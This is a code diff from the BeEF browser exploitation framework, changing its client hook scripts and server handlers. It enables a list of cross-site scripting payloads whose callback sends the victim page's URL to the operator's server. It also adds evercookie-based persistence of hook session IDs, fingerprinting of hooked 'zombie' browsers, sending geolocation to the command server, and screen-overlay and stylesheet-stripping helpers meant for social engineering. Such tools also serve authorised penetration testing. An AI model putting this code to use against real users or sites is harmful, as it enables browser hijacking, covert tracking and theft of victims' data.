if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
if (has_flash) details['HasFlash'] = has_flash if (has_flash) details['HasFlash'] = has_flash;
if (has_phonegap) details['HasPhonegap'] = has_phonegap if (has_phonegap) details['HasPhonegap'] = has_phonegap;
if (has_web_socket) details['HasWebSocket'] = has_web_socket if (has_web_socket) details['HasWebSocket'] = has_web_socket;
if (has_googlegears) details['HasGoogleGears'] = has_googlegears if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
if (has_webrtc) details['HasWebRTC'] = has_webrtc;
if (has_activex) details['HasActiveX'] = has_activex; if (has_activex) details['HasActiveX'] = has_activex;
if (has_silverlight) details['HasSilverlight'] = has_silverlight; if (has_silverlight) details['HasSilverlight'] = has_silverlight;
if (has_quicktime) details['HasQuickTime'] = has_quicktime; if (has_quicktime) details['HasQuickTime'] = has_quicktime;
@@ -1526,6 +1555,13 @@ beef.browser = {
return !!window.ActiveXObject; return !!window.ActiveXObject;
}, },
/**
* Returns boolean value depending on whether the browser supports WebRTC
*/
hasWebRTC:function () {
return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
},
/** /**
* Returns boolean value depending on whether the browser supports Silverlight * Returns boolean value depending on whether the browser supports Silverlight
*/ */

147
core/main/client/dom.js
View File

@@ -76,6 +76,30 @@ beef.dom = {
return iframe; return iframe;
}, },
/**
* Returns the highest current z-index
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
* @return: {Integer} Highest z-index in the DOM
* OR
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/** /**
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted. * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
var form_action = params['src']; var form_action = params['src'];
params['src'] = ''; params['src'] = '';
} }
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); } if (type == 'hidden') {
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); } css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body'); var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
if (form_submit && form_action) if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
} }
}); });
}, },
/**
* Load a full screen div that is black, or, transparent
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/** /**
* Create a form element with the specified parameters, appending it to the DOM if append == true * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -292,7 +392,7 @@ beef.dom = {
} }
content += "</object>"; content += "</object>";
} }
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) { if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) { if (codebase != null) {
content = "" + content = "" +
@@ -311,24 +411,25 @@ beef.dom = {
} }
content += "</applet>"; content += "</applet>";
} }
if (beef.browser.isFF()) { // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
if (codebase != null) { // if (beef.browser.isFF()) {
content = "" + // if (codebase != null) {
"<embed id='" + id + "' code='" + code + "' " + // content = "" +
"type='application/x-java-applet' codebase='" + codebase + "' " + // "<embed id='" + id + "' code='" + code + "' " +
"height='0' width='0' name='" + name + "'>"; // "type='application/x-java-applet' codebase='" + codebase + "' " +
} else { // "height='0' width='0' name='" + name + "'>";
content = "" + // } else {
"<embed id='" + id + "' code='" + code + "' " + // content = "" +
"type='application/x-java-applet' archive='" + archive + "' " + // "<embed id='" + id + "' code='" + code + "' " +
"height='0' width='0' name='" + name + "'>"; // "type='application/x-java-applet' archive='" + archive + "' " +
} // "height='0' width='0' name='" + name + "'>";
// }
if (params != null) { //
content += beef.dom.parseAppletParams(params); // if (params != null) {
} // content += beef.dom.parseAppletParams(params);
content += "</embed>"; // }
} // content += "</embed>";
// }
$j('body').append(content); $j('body').append(content);
}, },
@@ -375,11 +476,11 @@ beef.dom = {
* @params: {String} rport: remote port * @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service * @params: {String} commands: protocol commands to be executed by the remote host:port service
*/ */
createIframeIpecForm: function(rhost, rport, commands){ createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe(); var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form'); var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html'); formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST'); formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data'); formIpec.setAttribute('enctype', 'multipart/form-data');

10
core/main/client/geolocation.js
View File

@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({ $j.ajax({
error: function(xhr, status, error){ error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error"); beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude + "&longitude=" + longitude
+ "&osm=UNAVAILABLE" + "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True"); + "&geoLocEnabled=True");
}, },
success: function(data, status, xhr){ success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success"); beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data); var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False"); beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return; return;
} }
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition"); beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success function(position){ // success
var latitude = position.coords.latitude; var latitude = position.coords.latitude;
var longitude = position.coords.longitude; var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude); beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude); beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure }, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code); beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3 switch(error.code) // Returns 0-3
{ {
case 0: case 0:

2
core/main/client/hardware.js
View File

@@ -126,4 +126,4 @@ beef.hardware = {
} }
}; };
beef.regCmp('beef.net.hardware'); beef.regCmp('beef.hardware');

7
core/main/client/init.js
View File

@@ -13,7 +13,8 @@
* and will have a new session id. The new session id will need to know * and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again. * the brwoser details. So sendback the browser details again.
*/ */
BEEFHOOK = beef.session.get_hook_session_id();
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) { if (beef.pageIsLoaded) {
beef.net.browser_details(); beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
try { try {
callback(event); callback(event);
} catch (e) { } catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message); beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
} }
return false; return false;
} }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
try { try {
callback(event); callback(event);
} catch (e) { } catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message); beef.debug("window.onclose - couldn't execute callback: " + e.message);
} }
return false; return false;
} }

2
core/main/client/net/dns.js
View File

@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request // sends a DNS request
sendQuery = function(query) { sendQuery = function(query) {
//console.log("Requesting: "+query); beef.debug("Requesting: "+query);
var img = new Image; var img = new Image;
img.src = "http://"+query; img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); } img.onload = function() { dom.removeChild(this); }

28
core/main/client/net/xssrays.js
View File

@@ -49,22 +49,20 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [ vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true}, {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true}, {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //, {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true} {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true}, {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true}, {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}, {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true}, {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true}, {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true}, {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE. // util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) { printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) { if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log); beef.debug("[XssRays] " + log);
} }
}, },
@@ -340,8 +338,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'"; + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback); exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'"; + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback); exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'"; + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback)); exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>'; form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

15
core/main/client/session.js
View File

@@ -13,7 +13,8 @@ beef.session = {
hook_session_id_length: 80, hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(), ec: new evercookie(),
beefhook: "<%= @hook_session_name %>",
/** /**
* Gets a string which will be used to identify the hooked browser session * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
*/ */
get_hook_session_id: function() { get_hook_session_id: function() {
// check if the browser is already known to the framework // check if the browser is already known to the framework
var id = this.ec.evercookie_cookie("BEEFHOOK"); var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') { if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata("BEEFHOOK"); var id = this.ec.evercookie_userdata(beef.session.beefhook);
} }
if (typeof id == 'undefined') { if (typeof id == 'undefined') {
var id = this.ec.evercookie_window("BEEFHOOK"); var id = this.ec.evercookie_window(beef.session.beefhook);
} }
// if the browser is not known create a hook session id and set it // if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
*/ */
set_hook_session_id: function(id) { set_hook_session_id: function(id) {
// persist the hook session id // persist the hook session id
this.ec.evercookie_cookie("BEEFHOOK", id); this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata("BEEFHOOK", id); this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window("BEEFHOOK", id); this.ec.evercookie_window(beef.session.beefhook, id);
}, },
/** /**

3
core/main/client/updater.js
View File

@@ -15,6 +15,7 @@ beef.updater = {
// XHR-polling timeout. // XHR-polling timeout.
xhr_poll_timeout: "<%= @xhr_poll_timeout %>", xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
beefhook: "<%= @hook_session_name %>",
// A lock. // A lock.
lock: false, lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
get_commands: function() { get_commands: function() {
try { try {
this.lock = true; this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) { beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0) if (response.body != null && response.body.length > 0)
beef.updater.execute_commands(); beef.updater.execute_commands();
}); });

8
core/main/handlers/browserdetails.rb
View File

@@ -255,6 +255,14 @@ module BeEF
self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection." self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
end end
# get and store the yes|no value for HasWebRTC
has_webrtc = get_param(@data['results'], 'HasWebRTC')
if BeEF::Filters.is_valid_yes_no?(has_webrtc)
BD.set(session_id, 'HasWebRTC', has_webrtc)
else
self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasActiveX # get and store the yes|no value for HasActiveX
has_activex = get_param(@data['results'], 'HasActiveX') has_activex = get_param(@data['results'], 'HasActiveX')
if BeEF::Filters.is_valid_yes_no?(has_activex) if BeEF::Filters.is_valid_yes_no?(has_activex)

7
core/main/handlers/hookedbrowsers.rb
View File

@@ -51,13 +51,18 @@ module Handlers
# @note is a known browser so send instructions # @note is a known browser so send instructions
else else
# @note Check if we haven't seen this browser for a while, log an event if we haven't
if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
end
# @note record the last poll from the browser # @note record the last poll from the browser
hooked_browser.lastseen = Time.new.to_i hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event # @note Check for a change in zombie IP and log an event
if config.get('beef.http.use_x_forward_for') == true if config.get('beef.http.use_x_forward_for') == true
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"] if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}") BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"] hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
end end
else else

3
core/main/handlers/modules/beefjs.rb
View File

@@ -80,8 +80,9 @@ module BeEF
# @note set the XHR-polling timeout # @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path # @note set the hook file path and BeEF's cookie name
hook_session_config['hook_file'] = config.get("beef.http.hook_file") hook_session_config['hook_file'] = config.get("beef.http.hook_file")
hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
# @note if http_port <> public_port in config ini, use the public_port # @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil? unless hook_session_config['beef_public_port'].nil?

22
core/main/router/router.rb
View File

@@ -81,16 +81,34 @@ module BeEF
case type case type
when "apache" when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)", headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html" "Content-Type" => "text/html; charset=UTF-8"
when "iis" when "iis"
headers "Server" => "Microsoft-IIS/6.0", headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET", "X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html" "Content-Type" => "text/html; charset=UTF-8"
else else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis." print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
end end
end end
# @note If CORS are enabled, expose the appropriate headers
# this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
# and be able to handle requests with a JSON content-type
if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET",
"Access-Control-Allow-Headers" => "Content-Type"
halt 200
end
# @note If CORS are enabled, expose the appropriate headers
if config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET"
end
end end
# @note Default root page # @note Default root page

18
core/main/server.rb
View File

@@ -34,16 +34,18 @@ module BeEF
def to_h def to_h
{ {
'beef_version' => VERSION, 'beef_version' => VERSION,
'beef_url' => @url, 'beef_url' => @url,
'beef_root_dir' => @root_dir, 'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'), 'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'), 'beef_port' => @configuration.get('beef.http.port'),
'beef_public' => @configuration.get('beef.http.public'), 'beef_public' => @configuration.get('beef.http.public'),
'beef_public_port' => @configuration.get('beef.http.public_port'), 'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_dns' => @configuration.get('beef.http.dns'), 'beef_dns_host' => @configuration.get('beef.http.dns_host'),
'beef_hook' => @configuration.get('beef.http.hook_file'), 'beef_dns_port' => @configuration.get('beef.http.dns_port'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http" 'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
'client_debug' => @configuration.get("beef.client.debug")
} }
end end

1
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -86,6 +86,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
['Browser Components', 'Windows Media Player','HasWMP'], ['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'], ['Browser Components', 'VLC', 'HasVLC'],
